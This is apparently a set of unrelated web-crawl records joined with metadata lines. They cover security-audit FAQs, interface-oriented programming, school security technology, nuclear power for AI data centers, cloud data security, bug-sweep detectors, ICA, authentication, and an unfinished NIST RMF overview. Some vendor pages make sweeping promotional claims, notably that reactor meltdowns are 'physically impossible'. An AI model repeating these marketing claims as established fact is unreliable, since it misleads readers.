Neumetric, a products and services company, helps Organisations conduct effective internal audit programs to prevent data breaches and cyber attacks. We provide state-of-the-art security solutions that help organisations meet their compliance requirements and protect their most valuable asset: Data! To know more about our Information Security Programs, click here.
Why is auditing important in cyber security?
Auditing is important in cyber security because it helps to identify and quantify risks. It also allows you to assess the effectiveness of your security measures and determine whether they are adequate or need to be improved. Auditing can be performed manually or with the use of software tools.
Why is auditing important for networks?
A network audit is important for network security because it allows you to identify the vulnerabilities in your infrastructure and take measures to reduce them. It also helps you understand how data flows through your network so that you can implement policies that restrict unauthorised access.
How do you conduct an internal security audit?
To start, you should conduct a security audit. This is the process of examining your network and computer systems to find possible weaknesses in your defences.
Next, you should conduct a risk assessment. This is an analysis of the potential consequences of a breach or other cyber attack. Risk assessments help determine the probability that an attack will occur and what type of damage can result from it.
After conducting both audits and risk assessments, you can then decide whether or not to move forward with additional actions such as penetration testing or vulnerability scanning on top of everything else you’ve already done so far!
How can security breaches be prevented in the workplace?
Security breaches can be prevented to a great extent by using the right tools and by ensuring that your employees are trained in cybersecurity best practices.
How do you prevent security breaches and ensure that company data is secure?
Having a security policy in place helps in preventing data breaches. This is not just any other document that you will file away in your hard drive, but rather a living document that must be reviewed and updated regularly. You should also have a strong password policy, as well as patch management processes, user education programs, and IT governance processes. | <urn:uuid:32f04a19-7a40-43b8-9201-36d2ccef774d> | CC-MAIN-2024-38 | https://www.neumetric.com/how-internal-audits-can-help-you-prevent-data-breaches/ | 2024-09-14T16:42:36Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00520.warc.gz | en | 0.941151 | 2,875 | 3 | 3 |
So you've completed your Windows 2000 compatible product and you are ready to release it to the world. One small problem, you've coded for some new Windows API's that aren't available in NT 4.0, and Win2K is still in beta three. Hopefully you've got enough cash on hand to bide your time. This is just one scenario in which using interface-oriented programming can help insulate you and your code from changes beyond your control.
An interface is defined as the set of methods a class can perform plus the set of properties the class exposes. In some languages, there is no difference between a method and a property because each property is represented by pairs of methods such as GetMyProperty() and SetMyProperty(). By forcing others to refer to our classes only via the public interface and by only referencing others via their public interface, we can reduce the shock that typically accompanies future product changes.
Some of you are probably nodding along and thinking to yourselves, "Eric, you've just described Microsoft's COM architecture." You would be right. COM is an interface-oriented architecture, but it does not have a monopoly on this methodology. COM does, however, highlight another important interface-oriented programming technique --naming interfaces. Concerning naming, we should agree to do three things: name the interfaces we support, change the name of the interface if it ever changes and support both the newly named interface as well as the older interface. By following these conventions, the resulting objects will be less brittle when used by newer and older systems. Naming interfaces helps ActiveX components behave well in dozens of versions of different development tools. Incidentally, Microsoft happens to use a large binary number -- called a UID -- to name its interfaces, but that is not required to do interface-oriented programming.
Even if you’re not ready to embrace COM, either because of its complexity or because of your own cross-platform needs, you can still use interfaces to improve your code. Interfaces are natively supported by Java, Visual Basic, Delphi and, indirectly, in C++ -- although various vendors have added direct interface support. In traditional object-oriented solutions, a lot of emphasis is placed on creating a class hierarchy: Classes typically inherit the behaviors of its parents and then add some additional behavior of their own.
Interface-orientation de-emphasizes class hierarchy, replacing it with interface aggregation. Each class then chooses a distinct set of interfaces to implement, without any regard for related classes.
Experience has taught me traditional object-oriented inheritance is often an area that causes good code to turn brittle, especially if an expert didn’t create your original class hierarchy.
Using interfaces in C++, for example, can help you avoid some of the dangers of a bad hierarchy. In C++, an interface definition is typically a pure abstract class -- no implementation -- with only public methods and no member variables. You can then aggregate the interfaces your class supports by using multiple inheritance. You don't have to worry about the horror stories related to using multiple inheritance either. You aren't inheriting any data or implementation, just interfaces. The beauty of this technique is that you can share your classes by sharing header files containing only interfaces, so you have no worries about others making assumptions about how your class works. Since no one can guess how your class works from the header file, you are always free to change the implementation, including adding new interfaces, providing the original interface remains the same.
In addition to providing future flexibility, interface-orientation often simplifies design. Interfaces allow a divide-and-conquer approach to class design by removing or deferring the use of inheritance until implementation. Each logical group of functions that a class should perform can be grouped into an interface definition. Once the desired interfaces are written, similar interfaces can be combined. Traditional inheritance can then be introduced for implementation, if appropriate. In languages that support template programming, you can write templates that will automatically implement the interface for any class that aggregates the template, avoiding implementation inheritance entirely. This is exactly the approach taken by Microsoft’s Active Template Library (ATL).
In the past, PC solutions have often had short lifecycles. But as more enterprise solutions migrate to PCs, we need to adopt techniques that help our solutions last through multiple operating system releases and changes to third party libraries. Interface-oriented programming is one such technique. Your best source for learning interface-oriented programming today is to study how various Windows development tools implement COM. Microsoft’s ATL is complex, but it is a tour de force in interface programming. Armed with these techniques, you can be sure that you are well-insulated before you expose yourself. --Eric Binary Anderson is a development manager at PeopleSoft's PeopleTools division (Pleasanton, Calif.) and has his own consulting business, Binary Solutions. Contact him at firstname.lastname@example.org. | <urn:uuid:7b1f6f72-ba1f-4748-85c5-635a91997ea4> | CC-MAIN-2024-38 | https://esj.com/articles/1999/06/09/interface-insulation_633718593381868565.aspx | 2024-09-15T23:47:46Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00420.warc.gz | en | 0.92926 | 1,007 | 3.28125 | 3 |
In today’s world, ensuring the safety and security of students and staff within educational institutions has become a paramount concern. While traditional security measures remain important, such as security personnel and surveillance cameras, the integration of advanced security technologies is essential to create a safer learning environment.
Access Control Systems
Access control systems have evolved significantly over the years and have become a fundamental component of school security. These systems allow schools to regulate who can enter the premises, ensuring that only authorized individuals gain access. Modern access control systems incorporate features such as biometric scans, smart cards, or keyless entry methods, making it difficult for unauthorized personnel to enter the premises.
Video surveillance is a well-established technology in the realm of school security. However, with advancements in camera technology and video analytics, it has become even more powerful. High-definition cameras with night vision capabilities, along with intelligent video analytics, can provide real-time monitoring, instant alerts, and the ability to track suspicious activities. Video surveillance can deter potential threats and provide valuable evidence in the event of an incident.
Intrusion Detection Systems
Intrusion detection systems (IDS) are designed to identify unauthorized entry or suspicious activities within the school premises. These systems employ various sensors and detectors to monitor doors, windows, and other entry points. When triggered, IDS can alert security personnel or automatically lock down the building to prevent intruders from gaining access.
Panic Buttons and Emergency Alert Systems
Instant communication during emergency situations is crucial. Panic buttons and emergency alert systems enable school staff to quickly notify authorities and initiate lockdown procedures in the event of a threat. These systems can also disseminate alerts to students, teachers, and parents, providing essential information and guidance in critical situations.
Visitor Management Systems
Maintaining control over who enters the school campus is a fundamental aspect of security. Visitor management systems help schools keep track of everyone on the premises. These systems can scan IDs, verify visitor credentials, and maintain records of all individuals entering the school. This not only enhances security but also ensures the safety of students and staff.
Mass Notification Systems
During emergency situations, it’s vital to disseminate information rapidly. Mass notification systems can send out alerts via various channels, including SMS, email, social media, and intercom announcements. These systems ensure that everyone within the school community is informed and can take appropriate actions in response to threats or emergencies.
Biometric identification methods, such as fingerprint or facial recognition, offer an additional layer of security. These systems can be used to control access to secure areas or track attendance, making it difficult for unauthorized individuals to impersonate students or staff.
In today’s digital age, cybersecurity is just as essential as physical security. Schools store a wealth of sensitive information, and protecting this data from cyber threats is critical. Robust cybersecurity measures, including firewalls, intrusion detection, and regular security audits, are essential for safeguarding the school’s digital infrastructure.
Social Media Monitoring
Monitoring social media platforms can provide early warnings about potential threats or incidents. Schools can use social media monitoring tools to track mentions of their institution, students, or staff, enabling them to respond swiftly to any emerging concerns.
TRUST THE PROFESSIONALS AT ARK SYSTEMS
Located in Columbia, Maryland, ARK Systems provides unsurpassed quality and excellence in the security industry, from system design all the way through to installation. We handle all aspects of security with local and remote locations. With over 30 years in the industry, ARK Systems is an experienced security contractor. Trust ARK to handle your most sensitive data storage, surveillance, and security solutions. | <urn:uuid:cd21247c-230d-4e67-b00d-a1133b010ac9> | CC-MAIN-2024-38 | https://www.arksysinc.com/blog/enahncing-school-security-essential-technologies-for-a-safer-learning-environment/ | 2024-09-15T22:37:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00420.warc.gz | en | 0.921856 | 745 | 2.96875 | 3 |
Insight and analysis on the data center space from industry thought leaders.
AI’s Power Problem and How To Fix It
By using SMRs, data centers can achieve energy independence. This energy source holds the key to unlocking the full potential of AI.
July 18, 2023
AI is going to transform society as radically as harnessing electricity did. AI promises to increase productivity, decrease car accidents, help diagnose and treat disease with speed and precision, and streamline industrial processes to give us a cleaner environment.
But AI can fulfill its potential only if the data centers that run AI can access enough energy. And data centers are already struggling to find enough energy. Right now, energy bottlenecks in northern Virginia – the largest data center hub in the world – could delay new development into 2026. Demand for power has outgrown the capacity of existing power lines, and the resulting congestion is choking the supply of electricity to data centers. Adding AI into the mix will exacerbate these problems because a lot of energy is needed to train and operate AI models.
On top of that, the U.S. Environmental Protection Agency (EPA) is imposing strict emission limits on power plants. PJM (a grid operator serving 65 million people in 13 Mid-Atlantic and Midwest states) says fossil-fuel power plants are retiring much faster than alternative energy sources are getting developed. So data center developers will face energy shortages and must use low-emission energy sources to build new capacity.
Data centers can’t be built just anywhere. They need to be sited near power plants that have adequate transmission lines because it could take more than a decade to construct lines to move electricity from remote locations. They also have to be close to population centers where people are most likely to use their digital services and near other data centers to ensure easy exchange of information. Finally, they need to be built where the public will support them. Many communities oppose the construction of new data centers because they fear the facilities will leave less electricity for residents and local businesses.
Although solar and wind are en-vogue energy solutions, neither is reliable enough to power a data center because both depend on the weather. Data centers support our most critical systems – hospitals, national defense, GPS, communication, traffic lights, water, and wastewater treatment – so they need energy 24/7/365 in every type of weather and every type of circumstance. Plus, large solar and wind plants are sited in remote locations rather than in the population hubs where data centers are commonly located.
Natural gas and coal are reliable power sources, but new EPA air-quality restrictions make it hard to get permits for new fossil-fired power plants.
Nuclear power can meet all the energy needs of data centers: It’s reliable, affordable, and clean. But large nuclear plants require large up-front investments and take a long time to build. New reactors in Georgia ran $16 billion over budget and six years behind schedule, and few U.S. utilities are willing to take on that level of capital risk.
But there is a solution. Companies are working to help data centers overcome energy bottlenecks with small modular reactors (SMRs). SMRs have all the benefits of large nuclear plants, but they’re faster and much less expensive to build. Plus, SMRs can be designed to recycle spent fuel – both their fuel and fuel from large nuclear plants.
SMRs are the safest nuclear plants ever designed. They can cool themselves without relying on people, pumps, or mechanical systems to remove heat. Meltdowns are a thing of the past. The type of accidents that happened at Chornobyl, Fukushima, and Three Mile Island is physically impossible.
Plus, SMRs can be sited almost anywhere. They have a small footprint—about two acres for the smallest reactors. By contrast, traditional reactors require on average 800 acres of land. And since most SMRs don’t use water for cooling, they don’t have to be sited near a lake, river, or ocean. They can be installed on the site of a data center or at a nearby location in under a year.
SMRs are also affordable. Off-the-shelf components and factory prefabrication allow SMRs to provide power at competitive prices in most parts of the U.S. Perhaps best of all, developers do not need to risk capital because some SMR companies offer power purchase agreements (PPAs).
SMRs offer data centers a path to energy independence – one that avoids bottlenecks in the grid and competition for energy with local communities. This key energy source can provide the power to unlock the benefits of AI and transform modern society.
About the Author
You May Also Like | <urn:uuid:2c1aecab-180c-4665-99c5-d183ac90580d> | CC-MAIN-2024-38 | https://www.datacenterknowledge.com/ai-data-centers/ai-s-power-problem-and-how-to-fix-it | 2024-09-15T22:49:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00420.warc.gz | en | 0.944196 | 970 | 2.6875 | 3 |
If you follow me on twitter, you are probably very well aware of my rough ride in my summer class. So, my final paper has been handed in, and I have been mulling over what I can take away from this experience. This may turn into more than one post, but I think it’s important.
We all know that things are changing fast as far as education is concerned. All of a sudden, instructors have access to all sorts of tools. In this class alone, we were required to use the following instructional tools:
- Online readings
- A book (yes a normal book – I am listing ALL of the tools)
- Screenhunter (I used Snagit)
- We had to create a website (I used vi)
- My group used meebo to meet (Blackboard is not so great with synchronous communications)
- My group used slideshare
That is a lot of tools! That should be great right? In theory, educators now have lots of inexpensive tools that can be used to make their students’ learning experiences more meaningful.
The “more meaningful” bit is where it gets tricky. In order for instruction using these technical tools to be meaningful, strong design must go into the instruction. Without this design, students will be frustrated and refuse to use the tools, and this arsenal of new tools we have available to apply to instruction will become useless.
I am at an advantage here; I work in a group that creates technical training for our customers, partners, and internal personnel. I know what has to go into planning reusable technical labs that allow students to use all their cognitive powers to concentrate on lesson objectives (and not on learning yet another tool).
This is a critical point: it places an unfair cognitive burden on students when you expect them to learn new technical tools at the same time they are learning new lesson materials. You must either make the technology invisible, or teach them how to use the technology.
Here are things that need to be thought about when designing a class using these technical tools:
- Just because it was easy for you to pick up one of these new Learning 2.0 tools doesn’t mean that it will be as easy for your students.
You must provide instruction for the tools for those students who need them. - Will it run on all Operating Systems?
If you have a PC, will this new software run on a Mac? - Does the software have minimum requirements?
Will it run on all versions of Windows? Mac? All the flavors of Linux?
Does it require Microsoft Office products, or can it run on OpenOffice?
Do you need a certain amount of memory? You should really let your students know about this before the class starts, so they have a chance to tune up their computer. - Are there clear instructions available on how to access/install/use the software?
If not, you need to write these instructions before the class runs.
Don’t expect the learners will just figure it out, especially if this is not a class on how to access/install/use this software. - Are there security considerations to using the software?
As much as I like Diigo, it’s not something I could design into my courses because of confidentiality agreements. - Be available during the assignment window to help with technical questions.
If you are going to require students to use these tools, plan on being very available during the assignment periods. If assignments are due on Thursday nights, you will probably get lots of questions Thursday afternoon. (You could probably address this need with a wiki). - Do not burden the technical students in the class with being the technical mentors.
Your techie students probably won’t mind helping, but they did not take the class to sharpen their skills. If they are helping other students learn the technology, they are being robbed of learning time. That’s not really fair. - Be sure to keep the technical documentation up-to-date
Again, a wiki may come in very handy here.
In short, the stuff I learned in this class was not on the syllabus. It occurred to me I am probably the worst student possible for this class. I hope this post didn’t come across as too negative.
So what do you think? Am I completely off-base? Did I leave any good planning advice out of my list? | <urn:uuid:a5c94dce-3bdb-4641-948e-7953476052c8> | CC-MAIN-2024-38 | https://blog.ginaminks.com/lessons-i-learned-from-my-summer-class/ | 2024-09-20T23:36:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701425385.95/warc/CC-MAIN-20240920222945-20240921012945-00020.warc.gz | en | 0.953461 | 908 | 2.5625 | 3 |
Data Security in Cloud Computing
Cloud computing is a collection of IT resources accessible over the internet. These resources include infrastructure, data storage, applications, networking and software. Primarily, there are two types of clouds — public and private. Cloud computing allows workforces to access data from virtually anywhere, though this can also raise several data security concerns.
Securing a cloud environment is a shared responsibility between the cloud provider and the consumer. The cloud provider is often responsible for securing physical assets such as data centers, physical servers, network switches and routes, and you’re responsible for securing data storage, data and access to your systems and applications.
It’s your responsibility to secure data on the cloud. Cloud data security is the practice of protecting data and other digital assets from security threats. Learn more about how to secure your data in the cloud and reap the benefits of cloud computing securely.
What Is Cloud Data Security?
Data security in the cloud is a challenge that stems from the unique risks that technology brings as traditional network perimeters disappear. Data security in cloud computing requires a different approach — one that considers both the complexity of data and security models in the cloud.
Cloud data security involves implementing policies, procedures, technologies, controls and services to protect data, applications, users and systems in the cloud. A strong cloud data security strategy must include all aspects of protecting data, including:
- Data in use: Use proper authentication and access controls to secure data being accessed through an application or an endpoint.
- Data in transit: Protect in-transit data while it’s moving through the network using strong encryption and decryption methods.
- Data at rest: Secure stored data through proper access restrictions, user authentications and encryption.
To ensure this level of protection, security solutions should provide privacy across your networks, applications and other cloud environments. You should also have control over data access and complete visibility over all the data in your network, including in the cloud. Cloud data security solutions should also help you maintain data confidentiality, integrity and availability.
Cloud data security is essential for preventing lost, stolen, damaged or otherwise compromised data, which have significant consequences for your business. Understanding the need for data security in cloud computing improves your ability to safe-keep your business’s data.
Benefits of Data Security in Cloud Computing
Data security is essential in protecting your business data on the cloud. Consider these benefits of having data privacy and security in cloud computing.
1. Improved Regulatory Compliance
Data security solutions safeguard your sensitive data and help you comply with industry standards and regulations. Failure to maintain regulatory compliance may result in consequences like fines, loss of business and reputation risk. Industry-specific data security solutions and managed services typically provide effective regulatory compliance.
2. Increased Visibility
Visibility refers to your ability to monitor data across your network. Cloud data security allows you to gain visibility into areas you previously could not monitor and improve how you manage risks. Many cloud security services offer constant cloud monitoring of all your assets in the cloud. Increased cloud visibility increases the likelihood of identifying security risks before they materialize.
3. Lifecycle Protection
A cloud data security solution helps protect your data through its entire lifecycle, from cradle to grave. This ensures your data is protected through every stage rather than just storage.
4. Proactive Management
With increased visibility comes proactive threat management. Because cloud security allows you to identify security risks quickly, your IT team or managed service provider can immediately address the threat and mitigate data risks. Proactive threat management is essential because the longer threats go unmanaged, the more data can be compromised.
Security Issues With Cloud Computing
A common misconception about cloud computing is that it’s less secure than a physical data center. Realistically, cloud computing can be as secure as a physical server if it’s equipped with a proper cybersecurity strategy. This is where many companies experience security issues because they don’t realize cloud data requires updated security requirements.
Here are a few potential security issues you may encounter with the cloud:
- Data breaches and misconfigurations: Data breaches in the cloud look more like stolen credentials due to poor passwords and exploiting other areas of vulnerability. Similarly, misconfigurations exploit various security gaps to cause data breaches, allowing private data into the wrong hands.
- Unauthorized access: Whether malicious or accidental, lack of access control allows unauthorized users to access private data. In regulated industries, any unauthorized access is considered a breach. Insider threats use their access for the wrong reasons, leaking data from the inside.
- Unsecured APIs: Application programming interfaces (APIs) is software that allows two applications to communicate and work together. When using APIs to transfer data to suppliers or partners, data can be exposed if API endpoints are unsecured.
If properly secured mechanisms are put in place to safeguard an organization’s data, cloud computing can offer great benefits.
Cloud Data Security Best Practices
A cloud data security strategy made up of the right policies and procedures can provide strong data assurance. Consider these best practices to maximize your cloud data security.
1. Encrypt Your Data
Encrypt data with appropriate encryption protocols at all levels, including while data is at rest and in motion across all databases and secure file shares. An application must authenticate itself and provide the decoding key to decrypt data and make it available for the authorized user.
Good data storage hygiene, such as detecting and eliminating misconfigured data buckets on the cloud, and terminating orphan resources, also further helps improve security.
2. Prioritize Granular, Policy-Based Identity and Access Management, and Authentication Controls
Identity and access management is a data privacy tool in cloud computing that gives you more control over user access and privileges. Be sure to design group and role-based security rather than at the individual to make it easier when business requirements change. Grant only minimal access privileges to the essential assets and APIs. Enforce strong password policies, permission time-outs and other authentication best practices.
3. Implement Multi-Factor Authentication
Cloud security providers offer multi-factor authentication (MFA) to strengthen your security measures. MFA requires users to input additional identifying information with their login credentials to ensure the user logging in is who they say they are.
4. Safeguard Applications With Next-Generation Web Application Firewall
Next-generation web firewall will inspect and control traffic to and from web application servers. These firewalls also automatically update web application firewall rules in response to traffic behavior changes.
Protect Your Cloud Data With Contigo Technology
Contigo Technology has the IT solutions for you, whether you’re looking for cybersecurity or cloud computing services. Third-party providers like us offer significantly more flexibility at an affordable price. Managed cloud and cybersecurity services provide peace of mind and leave more time for you to manage your team.
Our highly experienced and knowledgeable team will consult with you to customize solutions and meet your business’s needs. Contact us to learn how we can help you protect your cloud data. | <urn:uuid:6fd541fc-4f0d-4f4c-8523-a398cfc14a8b> | CC-MAIN-2024-38 | https://www.contigotechnology.com/blog/data-security-in-cloud-computing/ | 2024-09-21T00:56:57Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701425385.95/warc/CC-MAIN-20240920222945-20240921012945-00020.warc.gz | en | 0.909726 | 1,441 | 3.15625 | 3 |
Non-Linear Junction Detection (NLJD) helps our technical consulting team locate spycams and other bugging devices even when they are turned off, and even if the batteries are dead.
How does a non-linear junction detector work?
A Non-Linear Junction Detector operates somewhat like the shoplifting detectors used by retailers. There, antennas near the doorways listen for a reflected signal from a shoplifting tag attached to an item. Interestingly, shoplifting tags do not contain batteries. They are simple devices that only contain an antenna and a diode.
Diodes are made from two dissimilar metals fused together. This creates what is called a non-linear junction. Transistors are made the same way. Non-linear junctions are the building block of all modern electronic devices, including bugs, recorders, and spycams.
How do you detect electronic devices?
When non-linear junctions are exposed to a strong radio signal, they reflect some of the original signal at twice the frequency! This phenomenon allows large areas to be scanned quickly in pursuit of the altered signal. The actual process is similar to sweeping a room with a flashlight beam. With the proper training and practice, technical specialists use these sweeps to detect and locate the origin of all re-radiated signals.
Non-linear junction detectors are also excellent at finding lost remote controls; very much appreciated when we are at our clients’ residences.
Why use Non-Linear Junction Detectors as a part of a TSCM (Technical Security Counter Measures) inspection?
Non-Linear Junction Detection is a non-destructive detection technique that sees through solid objects. This eliminates the intrusive disruption a physical search sometimes requires, like checking shelves full of books. More importantly, the Non-Linear Junction Detector speeds up the detection process dramatically. Speed allows us to evaluate your location expeditiously. It also allows our services to be more cost-effective for you.
It is always a very good idea to know who is listening in on private corporations, and who may have unauthorized access to information and trade secrets. As one manufacturer of Non-Linear Junction Detectors explains, NLJDs were developed first for use in embassies and diplomatic settings, and quickly established their “reputation as perfect means of counter-espionage.”
Have a Question About TSCM?
If you have any questions about Non-Linear Junction Detection (NLJD) or the TSCM consulting services provided by Murray Associates, simply fill out the form below, or call us from a safe area and phone.
If you think you are under active electronic surveillance, or believe you have discovered a bug or covert video camera, go to our Emergency TSCM page. The procedural checklist there will tell you exactly what you need to do next. | <urn:uuid:0f1d8344-2d7f-49db-b5ca-7c186b7e258e> | CC-MAIN-2024-38 | https://counterespionage.com/tscm-technology/non-linear-junction-detection-nljd/ | 2024-09-07T14:35:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00320.warc.gz | en | 0.941906 | 581 | 2.546875 | 3 |
Definition: Independent Component Analysis (ICA)
Independent Component Analysis (ICA) is a computational technique used to separate a multivariate signal into additive, independent components. It is commonly applied in the fields of signal processing and data analysis to identify underlying factors or components from multivariate statistical data. ICA is based on the assumption that the components are non-Gaussian and statistically independent of each other, making it particularly effective in applications like blind source separation where the goal is to recover independent signals from their mixtures without prior knowledge of the mixing process.
Expanding on the definition, ICA plays a crucial role in extracting meaningful information from complex datasets by identifying components that are maximally independent from each other. This separation process is particularly useful in scenarios where the measurement data is a mixture of several independent sources, and there is a need to isolate these sources for further analysis. The non-Gaussianity criterion is a key aspect of ICA, as it leverages the statistical properties of the sources to facilitate their separation, given that independence is maximally expressed when signals are non-Gaussian.
Applications of ICA
Independent Component Analysis finds extensive applications across various domains:
- Biomedical Signal Processing: ICA is instrumental in analyzing EEG (electroencephalography) and MEG (magnetoencephalography) data, separating artifacts from neural signals.
- Image Processing: It helps in noise reduction, image enhancement, and feature extraction from images and video sequences.
- Audio Signal Processing: ICA is used for blind source separation tasks, such as separating voices from overlapping audio signals.
- Financial Data Analysis: In finance, ICA can help identify underlying factors affecting stock prices or market trends.
- Telecommunications: It’s applied in separating signals that have been mixed in channels, improving the clarity and quality of received signals.
Benefits of ICA
The benefits of employing Independent Component Analysis include:
- Clarity and Enhancement: By separating mixed signals into independent components, ICA enhances the clarity and interpretability of data.
- Noise Reduction: It effectively isolates noise components from signal data, improving the quality of the analyzed signals.
- Feature Extraction: ICA facilitates the identification of hidden features within data, which can be crucial for pattern recognition and predictive modeling.
- Application Versatility: Its ability to be applied across a wide range of fields and data types makes ICA a versatile tool for researchers and practitioners.
How ICA Works
The underlying principle of ICA involves assuming that the observed data is a linear mixture of independent components. The goal is to find a matrix that, when multiplied by the observed data, yields the independent components. This involves several steps:
- Centering and Whitening: Preprocessing the data to make it have zero mean and unit variance, simplifying the problem.
- Estimating the Mixing Matrix: Using optimization techniques to estimate the matrix that describes how the original signals were mixed.
- Maximizing Non-Gaussianity: Employing measures of non-Gaussianity, such as negentropy, to guide the separation process, as independent components are assumed to be more non-Gaussian than their mixtures.
Real-world Example: Blind Source Separation
A classic application of ICA is in blind source separation, where the task is to separate audio signals that have been mixed together. Imagine recording a conversation with two people speaking simultaneously, using two microphones placed at different locations. Each microphone captures a different mixture of the two speakers’ voices. Using ICA, one can separate these mixed signals into two independent components, each corresponding to one of the speaker’s voice, without prior knowledge of the speakers’ locations or the sound propagation path.
Frequently Asked Questions Related to Independent Component Analysis (ICA)
What Is Independent Component Analysis (ICA) Used For?
ICA is used for separating a multivariate signal into additive, independent non-Gaussian components, commonly applied in signal processing, biomedical data analysis, and financial data analysis to extract meaningful information from complex datasets.
How Does ICA Differ From PCA?
While both ICA and PCA (Principal Component Analysis) are used for dimensionality reduction and feature extraction, PCA focuses on maximizing variance and finds orthogonal components, whereas ICA separates a multivariate signal into statistically independent, non-Gaussian components.
Can ICA Be Used for Noise Reduction?
Yes, ICA can be effectively used for noise reduction by isolating and removing components that are identified as noise from the signal data, thereby enhancing the signal quality.
What Are the Challenges in Applying ICA?
The main challenges include the requirement for statistical independence among components, difficulty in choosing the correct number of components, and the need for large data sets to achieve accurate separation.
How Is Non-Gaussianity Related to ICA?
Non-Gaussianity is a key concept in ICA, as it is used to measure the independence of components. Independent components are assumed to be more non-Gaussian than their mixtures, making non-Gaussianity a guiding principle for separating components.
What Makes ICA Suitable for Blind Source Separation?
ICA is suitable for blind source separation due to its ability to separate mixed signals into independent components without prior knowledge of the source signals or the mixing process, leveraging statistical independence and non-Gaussianity.
Can ICA Be Applied to Non-Linear Mixtures?
Traditional ICA is designed for linear mixtures. However, extensions and variations of ICA have been developed to address non-linear mixtures, though these models are generally more complex and less robust.
Is There a Standard Algorithm for Performing ICA?
There is no single standard algorithm for ICA; various algorithms exist, such as FastICA, Infomax, and JADE, each with its own advantages and suited to different types of data and applications.
How Important Is Preprocessing in ICA?
Preprocessing steps like centering, whitening, and dimensionality reduction are crucial in ICA, as they simplify the problem and enhance the algorithm’s ability to accurately separate independent components. | <urn:uuid:59bd36a1-3bda-4724-935c-3a585d65aae4> | CC-MAIN-2024-38 | https://www.ituonline.com/tech-definitions/what-is-independent-component-analysis-ica/ | 2024-09-07T14:13:18Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00320.warc.gz | en | 0.917789 | 1,266 | 3.5 | 4 |
The terms authentication and authorization may sound similar, but they are distinct when it comes to their core functions. Authentication and authorization are security processes that are executed when users try to access their resources. Authentication and authorization play vital roles in preventing cybersecurity breaches and bolstering the security system of an organization.
Authentication is the process of verifying a user’s identity who requires access to resources such as applications, systems, and networks. Access to these resources is only permitted if the user is successfully authenticated after entering the credentials or other modes of authentications such as biometrics.
Authorization is the process of validating the user to check if the user has the privileges to access a specific system, application, or network. Authorization is associated with control of access and user privileges. Factors such as the user’s age, role, and other metadata play an important role in the authorization process.
To access a resource, the user is authenticated first and then authorized.
This is an authentication process in which a password is a combination of letters, numbers, and special characters. Simple passwords are created by users so that they can easily remember them, but this makes their accounts vulnerable to hackers. Hackers gain access to the user's account by continuously trying out different combinations of letters, numbers, and special characters. A long (more than 10 characters) combination of different characters, letters, and numbers is recommended for passwords.
This is an authentication process that involves utilizing the user's biological information for identity verification. Biometrics are convenient to use and are faster when compared to passwords. Some biometrics used frequently are as follows:
Biometric | Authentication factor |
Fingerprint recognition | Authentication is based on the unique fingerprint pattern of the user. |
Facial recognition | Authentication is based on the unique facial characteristics of the user. |
Retina/iris scanners | Authentication is based on the unique pattern of a person's iris. |
Authentication is based on a unique, encrypted string of characters. A token-based authentication application sends an encrypted text to the user's smartphone or email; the user has to enter this encrypted text to gain access to their resources.
Multi-factor authentication involves two or more authentication methods. For example, a user's fingerprint and one-time password (OTP) sent to the user's smartphone are required to log in.
Attribute-based access control (ABAC) authorization is related to a specific user attribute. Information such as age, demographics, and relationships are some attributes of a user. ABAC authorization is executed when the user is trying to access the resources; it requires a specific attribute for granting permissions to the user.
For example, a voting system will only authorize the permission to vote if the user's age is 18 or greater.
Role-based access control (RBAC) authorization is related to the role of the user, not the user directly. In an organization, different users have different roles. In this authorization method, permission to use a resource is only granted if the role of the user has the privilege to access the resource.
For example, the ability to onboard or offboard an employee is only possible if the user account has an HR role.
Authentication | Authorization |
Authentication verifies the user's identity | Authorization checks if the user has the privilege to access the resources |
Authentication is processed before authorization | Authorization is processed after authentication |
Visible to the user | Not visible to the user |
Data for authentication moves as an ID token | Data for authorization moves as an access token |
The authentication process is managed by user credentials, biometrics, OTPs, or other applications | The authorization process is managed by IT administrators or IT security |
Authentication processes like login credentials are partially changeable by the user | Authorization settings cannot be changed by the user; they can only be changed by the IT administrators or IT security teams |
Technology advances every day, and many organizations are also adapting quickly. IT administrators need to ensure that their organization's security system is updated. The authentication and authorization procedure is a critical component of any security system. When dealing with an organization's sensitive data assets, both authentication and authorization are essential; neglecting either of these processes would leave the organization vulnerable to data breaches and illegal access.
Organizations are gradually moving away from passwords and toward authentication apps and biometrics, which provide a better user experience and better security. There are various types of authentication and authorization methods that can be implemented accordingly to fortify an organization's security system. | <urn:uuid:90aa7622-89a3-442a-9183-b44cc900ee00> | CC-MAIN-2024-38 | https://www.manageengine.com/active-directory-360/manage-and-protect-identities/iam-library/authentication/authentication-vs-authorization.html | 2024-09-08T20:36:59Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651017.43/warc/CC-MAIN-20240908181815-20240908211815-00220.warc.gz | en | 0.932023 | 930 | 3.921875 | 4 |
The National Institute of Standards and Technology (NIST) Risk Management Framework (RMF) is a robust, adaptable method for managing and mitigating information security risks within government agencies and organizations working with government systems. It integrates security, privacy, and cyber supply chain risk management into the system development life cycle. The RMF enables continuous cybersecurity risk management, compliance assurance in diverse environments, and enhanced supply chain and personnel security.
NIST plays a pivotal role in providing guidance and standards for federal agencies and their information systems and organizations. This extends to vital sectors like the Department of Defense (DoD), where robust security measures are essential.
NIST’s comprehensive framework aids federal agencies, including the DoD, in ensuring the security and resilience of their federal information systems. By adhering to NIST’s guidelines and recommendations, federal agencies can strengthen their cybersecurity posture, protect sensitive data, and mitigate risks effectively, aligning their operations with best practices and safeguarding national interests.
The 7 NIST Risk Management Framework Steps
The NIST Risk Management Framework (RMF) consists of seven steps that guide organizations through the RMF process of managing and mitigating risks associated with information security. These steps are as follows:
- Prepare: This step involves preparing the organization to manage security and privacy risks.
